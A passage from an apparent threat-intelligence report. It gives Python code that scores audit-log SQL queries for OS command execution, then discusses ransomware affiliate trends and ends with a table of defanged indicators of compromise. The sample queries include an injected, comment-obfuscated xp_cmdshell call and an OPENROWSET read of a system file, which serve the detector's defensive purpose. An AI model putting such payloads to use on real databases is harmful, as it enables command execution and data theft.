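
def sql_command_indicators(query: str) -> dict:
    """Score one query; OS-reaching procedures weigh 2, supporting traits 1."""
    text = normalize_sql(query)
    score, reasons = 0, []
    for proc in OS_EXEC_PROCS:
        if re.search(rf"\b{proc}\b", text):
            reasons.append(f"os_exec_proc:{proc}")
            score += 2
    if OPENROWSET_BULK_RE.search(text):
        reasons.append("openrowset_bulk")
        score += 2
    if STACKED_RE.search(text):
        reasons.append("stacked_statement")
        score += 1
    if CONFIG_RE.search(text):
        reasons.append("config_change")
        score += 1
    return {"score": score, "reasons": reasons, "alert": score >= 2}


def find_alerts(queries: list) -> list:
    """Return the indexes of queries that reach the alert threshold."""
    return [i for i, q in enumerate(queries) if sql_command_indicators(q)["alert"]]


# Constructed sample queries as a database audit log would record them.
SAMPLE_QUERIES = [
    "SELECT name FROM products WHERE id = 42",
    "SELECT name FROM products WHERE id = 42; EXEC xp_/**/cmdshell 'dir'",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
    r"SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS f",
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(sql_command_indicators(q))
```

The maintenance statement (`sp_configure` on its own) scores one point and stays quiet, so routine DBA work does not page anyone, while the comment-split `xp_cmdshell` in a stacked statement is raised once the comment is stripped. The weights are the tuning surface; an NGFW in front of the file-transfer server, as the first action item recommends, sees the same payload before it reaches the database.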
Key Takeaways and What’s Next
Attackers continually probe organizations for weaknesses while quickly adopting new techniques to increase their success rates. This is evident in the rapid adoption of malware leveraging ClickFix and the continued use of Microsoft Teams for phishing—both almost certainly designed to mislead security teams and bypass defenses. Similarly, CL0P’s continued success with mass exploitation campaigns highlights an effective strategy that will likely be repeated and adopted by other financially motivated groups.
Looking ahead, the cybersecurity landscape will continue to rapidly evolve, with adversaries developing new attack methods and borrowing proven techniques pioneered by others. Additionally, affiliates are likely to shift to other groups or establish their own operations to maximize profits.
Enterprising Affiliates Gain Independence: Changes in group dynamics such as infighting within the Black Basta group and RansomHub’s reduced affiliate profit split (90% to 85%, see Figure 8) will likely push affiliates to join other groups or launch independent operations. As seen with the drop in encryption attacks in 2024, more organizations are refusing extortion demands and rebuilding networks, driving attackers toward exfiltration-only attacks. These attacks don’t require coordination with ransomware developers, enabling adversaries to eliminate profit-sharing and operate independently.
This will result in fragmented groups, overlapping TTPs, and a more diverse threat landscape, complicating attribution. Techniques like Microsoft Teams phishing will likely become more prevalent as attackers share their methods with other criminal groups.
Figure 9: RansomHub reduces affiliate profit share
Attackers Shift Toward Greater Specialization: As achieving initial access becomes more challenging because of improved defenses, the demand for access brokers will rise. For example, VPN listings advertised by initial access brokers (IABs) increased by 250% from 2023 to 2024, with “buy now” prices rising by 46%. This trend will likely fuel a surge in IAB activity as they seek to capitalize on the lucrative opportunity.
Attackers may also follow CL0P’s example by turning to exploits for mass breaches, further driving demand for specialized exploit developers. As the availability of exploits increases, costs will likely drop, lowering the barrier for other attackers to purchase and deploy these exploits—ultimately enabling more widespread attacks.
IOCs
Artifact | Details |
---|---|
98[.]185[.]158[.]20, 94[.]156[.]227[.]69, 174[.]114[.]231[.]18, 74[.]206[.]139[.]3, 207[.]188[.]157[.]230, 87[.]103[.]126[.]54, 94[.]156[.]227[.]68, 94[.]156[.]227[.]71, 76[.]138[.]103[.]65, 40[.]126[.]229[.]236, 189[.]182[.]97[.]191, 103[.]35[.]189[.]243, 128[.]234[.]18[.]140, 94[.]156[.]227[.]70, 45[.]61[.]150[.]97, 62[.]60[.]154[.]163, 82[.]42[.]84[.]202, 173[.]44[.]141[.]50, 107[.]158[.]128[.]20, 196[.]251[.]117[.]191, 47[.]249[.]3[.]152, 76[.]154[.]146[.]156, 94[.]156[.]227[.]67, 68[.]61[.]206[.]86, 95[.]158[.]13[.]3, 91[.]205[.]164[.]183, 88[.]97[.]239[.]161 | Source IP addresses identified conducting brute-force attacks on external remote services. Before implementing network blocks, determine whether any of the IP addresses are associated with websites that are essential for business operations. |
assets-gbr.mkt.dynamics[dot]com, files-share.portseattles[dot]org | Sneaky 2FA phishing domains. |
[email protected][dot]com, [email protected][dot]com, [email protected][dot]com, [email protected][dot]com, [email protected][dot]com, [email protected][dot]com, [email protected][dot]com, [email protected], admin_26@tntheatre674[dot]onmicrosoft[dot]com | Microsoft Teams phishing tenants. For further investigation, threat hunts can be conducted on the provided tenants that were used to create chats. |
52[.]168[.]112[.]80, 98[.]158[.]100[.]22, 52[.]168[.]112[.]87, 78[.]46[.]67[.]201, 13[.]86[.]223[.]91, 13[.]86[.]223[.]89, 52[.]168[.]112[.]86, 52[.]148[.]43[.]94, 52[.]168[.]112[.]84 | Microsoft Teams phishing source IP addresses. For further investigation, threat hunts can be initiated on the provided IP addresses to identify previous Microsoft Teams chats created. |
human-verify[dot]shop/xfiles/verify.mp4, sirax[dot]shop/redclaprubz.m4a, teroniga[dot]shop/remingofugu.m4a, lack-behind-came-verification.trycloudflare[dot]com/cloudfla, u1.tightlyreporter[dot]shop/sosalkino[dot]mov, sandbox.yunqof[dot]shop/macan.mp3, igameinfinity[dot]shop/suno.mp3, xx.retweet[dot]shop | ClearFake domains. |
[1] hxxps://www.bleepingcomputer[.]com/news/security/massive-brute-force-attack-uses-28-million-ips-to-target-vpn-devices/
[2] hxxps://www.forbes[.]com/sites/daveywinder/2025/03/15/now-ransomware-attackers-can-brute-force-your-vpns-and-firewalls/
[3] hxxps://www.securityweek[.]com/black-basta-leak-offers-glimpse-into-groups-inner-workings/
[4] hxxps://learn.microsoft[.]com/en-us/purview/audit-log-activities
[5] hxxps://support.cleo[.]com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory-CVE-2024-50623